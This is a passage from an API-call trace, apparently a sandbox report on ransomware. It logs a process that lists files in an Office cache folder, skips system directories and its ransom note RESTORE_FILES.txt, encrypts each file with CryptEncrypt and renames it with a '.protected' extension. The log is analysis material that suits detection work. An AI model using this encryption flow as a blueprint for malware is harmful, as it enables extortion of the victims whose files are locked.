lpBuffer=0x4adad8*, lpNumberOfBytesRead=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0061.086] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0061.086] WriteFile (in: hFile=0xb4, lpBuffer=0x4adad8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4adad8*, lpNumberOfBytesWritten=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0061.086] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0061.086] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0061.158] WriteFile (in: hFile=0xb4, lpBuffer=0x47b7a8*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x47b7a8*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0061.158] CloseHandle (hObject=0xb4) returned 1 [0061.159] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.msi.protected") returned 91 [0061.159] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.msi" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\office32ww.msi"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.msi.protected" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\office32ww.msi.protected")) returned 1 [0061.165] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0061.165] lstrcmpiW (lpString1="Office32WW.xml", lpString2="Windows") returned -1 [0061.165] lstrcmpiW (lpString1="Office32WW.xml", lpString2="Program Files") returned -1 [0061.165] lstrcmpiW (lpString1="Office32WW.xml", lpString2="Program Files (x86)") returned -1 [0061.165] lstrcmpiW (lpString1="Office32WW.xml", lpString2="$Recycle.bin") returned 1 [0061.165] lstrcmpiW (lpString1="Office32WW.xml", lpString2="System Volume Information") returned -1 [0061.165] wnsprintfW (in: pszDest=0x495c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.xml") returned 81 [0061.165] StrStrIW (lpFirst="Office32WW.xml", lpSrch=".protected") returned 0x0 [0061.165] lstrcmpW (lpString1="Office32WW.xml", lpString2="RESTORE_FILES.txt") returned -1 [0061.165] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0061.165] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x30) returned 1 [0061.166] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.xml" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\office32ww.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0061.166] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.xml") returned 81 [0061.166] StrStrW (lpFirst="Office32WW.xml", lpSrch=".txt") returned 0x0 [0061.166] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.xml") returned 81 [0061.166] StrStrW (lpFirst="Office32WW.xml", lpSrch=".rar") returned 0x0 [0061.166] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.xml") returned 81 [0061.166] StrStrW (lpFirst="Office32WW.xml", lpSrch=".zip") returned 0x0 [0061.166] ReadFile (in: hFile=0xb4, lpBuffer=0x4adad8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4adad8*, lpNumberOfBytesRead=0x295f174*=0x10b2, lpOverlapped=0x0) returned 1 [0061.180] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffef4e, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0061.180] WriteFile (in: hFile=0xb4, lpBuffer=0x4adad8*, nNumberOfBytesToWrite=0x10b2, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4adad8*, lpNumberOfBytesWritten=0x295f174*=0x10b2, lpOverlapped=0x0) returned 1 [0061.180] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0061.180] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0061.180] WriteFile (in: hFile=0xb4, lpBuffer=0x47b7a8*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x47b7a8*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0061.180] CloseHandle (hObject=0xb4) returned 1 [0061.180] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.xml.protected") returned 91 [0061.180] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.xml" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\office32ww.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.xml.protected" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\office32ww.xml.protected")) returned 1 [0061.181] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0061.181] lstrcmpiW (lpString1="ose.exe", lpString2="Windows") returned -1 [0061.181] lstrcmpiW (lpString1="ose.exe", lpString2="Program Files") returned -1 [0061.181] lstrcmpiW (lpString1="ose.exe", lpString2="Program Files (x86)") returned -1 [0061.181] lstrcmpiW (lpString1="ose.exe", lpString2="$Recycle.bin") returned 1 [0061.181] lstrcmpiW (lpString1="ose.exe", lpString2="System Volume Information") returned -1 [0061.181] wnsprintfW (in: pszDest=0x495c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ose.exe") returned 74 [0061.181] StrStrIW (lpFirst="ose.exe", lpSrch=".protected") returned 0x0 [0061.181] lstrcmpW (lpString1="ose.exe", lpString2="RESTORE_FILES.txt") returned -1 [0061.181] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0061.181] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x30) returned 1 [0061.181] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ose.exe" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\ose.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0061.184] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ose.exe") returned 74 [0061.184] StrStrW (lpFirst="ose.exe", lpSrch=".txt") returned 0x0 [0061.184] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ose.exe") returned 74 [0061.184] StrStrW (lpFirst="ose.exe", lpSrch=".rar") returned 0x0 [0061.184] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ose.exe") returned 74 [0061.184] StrStrW (lpFirst="ose.exe", lpSrch=".zip") returned 0x0 [0061.184] ReadFile (in: hFile=0xb4, lpBuffer=0x4adad8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4adad8*, lpNumberOfBytesRead=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0061.196] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0061.196] WriteFile (in: hFile=0xb4, lpBuffer=0x4adad8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4adad8*, lpNumberOfBytesWritten=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0061.219] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0061.219] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0061.251] WriteFile (in: hFile=0xb4, lpBuffer=0x47b7a8*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x47b7a8*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0061.251] CloseHandle (hObject=0xb4) returned 1 [0061.252] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ose.exe.protected") returned 84 [0061.252] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ose.exe" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\ose.exe"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ose.exe.protected" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\ose.exe.protected")) returned 1 [0061.252] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0061.252] lstrcmpiW (lpString1="osetup.dll", lpString2="Windows") returned -1 [0061.252] lstrcmpiW (lpString1="osetup.dll", lpString2="Program Files") returned -1 [0061.252] lstrcmpiW (lpString1="osetup.dll", lpString2="Program Files (x86)") returned -1 [0061.252] lstrcmpiW (lpString1="osetup.dll", lpString2="$Recycle.bin") returned 1 [0061.252] lstrcmpiW (lpString1="osetup.dll", lpString2="System Volume Information") returned -1 [0061.252] wnsprintfW (in: pszDest=0x495c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\osetup.dll") returned 77 [0061.253] StrStrIW (lpFirst="osetup.dll", lpSrch=".protected") returned 0x0 [0061.253] lstrcmpW (lpString1="osetup.dll", lpString2="RESTORE_FILES.txt") returned -1 [0061.253] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0061.253] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x30) returned 1 [0061.253] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\osetup.dll" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\osetup.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0061.254] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\osetup.dll") returned 77 [0061.254] StrStrW (lpFirst="osetup.dll", lpSrch=".txt") returned 0x0 [0061.254] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\osetup.dll") returned 77 [0061.254] StrStrW (lpFirst="osetup.dll", lpSrch=".rar") returned 0x0 [0061.254] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\osetup.dll") returned 77 [0061.254] StrStrW (lpFirst="osetup.dll", lpSrch=".zip") returned 0x0 [0061.254] ReadFile (in: hFile=0xb4, lpBuffer=0x4adad8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4adad8*, lpNumberOfBytesRead=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0061.262] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0061.262] WriteFile (in: hFile=0xb4, lpBuffer=0x4adad8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4adad8*, lpNumberOfBytesWritten=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0061.262] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0061.263] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0061.267] WriteFile (in: hFile=0xb4, lpBuffer=0x47b7a8*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x47b7a8*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0061.267] CloseHandle (hObject=0xb4) returned 1 [0061.267] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\osetup.dll.protected") returned 87 [0061.267] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\osetup.dll" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\osetup.dll"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\osetup.dll.protected" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\osetup.dll.protected")) returned 1 [0061.268] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0061.268] lstrcmpiW (lpString1="OWOW32WW.cab", lpString2="Windows") returned -1 [0061.268] lstrcmpiW (lpString1="OWOW32WW.cab", lpString2="Program Files") returned -1 [0061.268] lstrcmpiW (lpString1="OWOW32WW.cab", lpString2="Program Files (x86)") returned -1 [0061.268] lstrcmpiW (lpString1="OWOW32WW.cab", lpString2="$Recycle.bin") returned 1 [0061.268] lstrcmpiW (lpString1="OWOW32WW.cab", lpString2="System Volume Information") returned -1 [0061.268] wnsprintfW (in: pszDest=0x495c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab") returned 79 [0061.268] StrStrIW (lpFirst="OWOW32WW.cab", lpSrch=".protected") returned 0x0 [0061.268] lstrcmpW (lpString1="OWOW32WW.cab", lpString2="RESTORE_FILES.txt") returned -1 [0061.268] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0061.268] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x30) returned 1 [0061.268] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\owow32ww.cab"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0061.269] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab") returned 79 [0061.269] StrStrW (lpFirst="OWOW32WW.cab", lpSrch=".txt") returned 0x0 [0061.269] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab") returned 79 [0061.269] StrStrW (lpFirst="OWOW32WW.cab", lpSrch=".rar") returned 0x0 [0061.269] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab") returned 79 [0061.269] StrStrW (lpFirst="OWOW32WW.cab", lpSrch=".zip") returned 0x0 [0061.269] ReadFile (in: hFile=0xb4, lpBuffer=0x4adad8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4adad8*, lpNumberOfBytesRead=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0061.285] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0061.285] WriteFile (in: hFile=0xb4, lpBuffer=0x4adad8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4adad8*, lpNumberOfBytesWritten=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0061.286] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0061.286] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0061.298] WriteFile (in: hFile=0xb4, lpBuffer=0x47b7a8*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x47b7a8*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0061.298] CloseHandle (hObject=0xb4) returned 1 [0061.299] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab.protected") returned 89 [0061.299] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\owow32ww.cab"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab.protected" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\owow32ww.cab.protected")) returned 1 [0061.299] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0061.299] lstrcmpiW (lpString1="PidGenX.dll", lpString2="Windows") returned -1 [0061.299] lstrcmpiW (lpString1="PidGenX.dll", lpString2="Program Files") returned -1 [0061.299] lstrcmpiW (lpString1="PidGenX.dll", lpString2="Program Files (x86)") returned -1 [0061.299] lstrcmpiW (lpString1="PidGenX.dll", lpString2="$Recycle.bin") returned 1 [0061.299] lstrcmpiW (lpString1="PidGenX.dll", lpString2="System Volume Information") returned -1 [0061.299] wnsprintfW (in: pszDest=0x495c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\PidGenX.dll") returned 78 [0061.299] StrStrIW (lpFirst="PidGenX.dll", lpSrch=".protected") returned 0x0 [0061.299] lstrcmpW (lpString1="PidGenX.dll", lpString2="RESTORE_FILES.txt") returned -1 [0061.300] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0061.300] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x30) returned 1 [0061.300] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\PidGenX.dll" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\pidgenx.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0061.301] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\PidGenX.dll") returned 78 [0061.301] StrStrW (lpFirst="PidGenX.dll", lpSrch=".txt") returned 0x0 [0061.301] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\PidGenX.dll") returned 78 [0061.301] StrStrW (lpFirst="PidGenX.dll", lpSrch=".rar") returned 0x0 [0061.301] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\PidGenX.dll") returned 78 [0061.301] StrStrW (lpFirst="PidGenX.dll", lpSrch=".zip") returned 0x0 [0061.301] ReadFile (in: hFile=0xb4, lpBuffer=0x4adad8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4adad8*, lpNumberOfBytesRead=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0061.312] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0061.313] WriteFile (in: hFile=0xb4, lpBuffer=0x4adad8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4adad8*, lpNumberOfBytesWritten=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0061.313] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0061.313] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0061.321] WriteFile (in: hFile=0xb4, lpBuffer=0x47b7a8*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x47b7a8*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0061.321] CloseHandle (hObject=0xb4) returned 1 [0061.321] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\PidGenX.dll.protected") returned 88 [0061.321] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\PidGenX.dll" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\pidgenx.dll"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\PidGenX.dll.protected" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\pidgenx.dll.protected")) returned 1 [0061.322] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0061.322] lstrcmpiW (lpString1="pkeyconfig-office.xrm-ms", lpString2="Windows") returned -1 [0061.322] lstrcmpiW (lpString1="pkeyconfig-office.xrm-ms", lpString2="Program Files") returned -1 [0061.322] lstrcmpiW (lpString1="pkeyconfig-office.xrm-ms", lpString2="Program Files (x86)") returned -1 [0061.322] lstrcmpiW (lpString1="pkeyconfig-office.xrm-ms", lpString2="$Recycle.bin") returned 1 [0061.322] lstrcmpiW (lpString1="pkeyconfig-office.xrm-ms", lpString2="System Volume Information") returned -1 [0061.322] wnsprintfW (in: pszDest=0x495c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms") returned 91 [0061.322] StrStrIW (lpFirst="pkeyconfig-office.xrm-ms", lpSrch=".protected") returned 0x0 [0061.322] lstrcmpW (lpString1="pkeyconfig-office.xrm-ms", lpString2="RESTORE_FILES.txt") returned -1 [0061.322] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0061.322] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x30) returned 1 [0061.322] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\pkeyconfig-office.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0061.322] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms") returned 91 [0061.322] StrStrW (lpFirst="pkeyconfig-office.xrm-ms", lpSrch=".txt") returned 0x0 [0061.322] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms") returned 91 [0061.322] StrStrW (lpFirst="pkeyconfig-office.xrm-ms", lpSrch=".rar") returned 0x0 [0061.322] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All 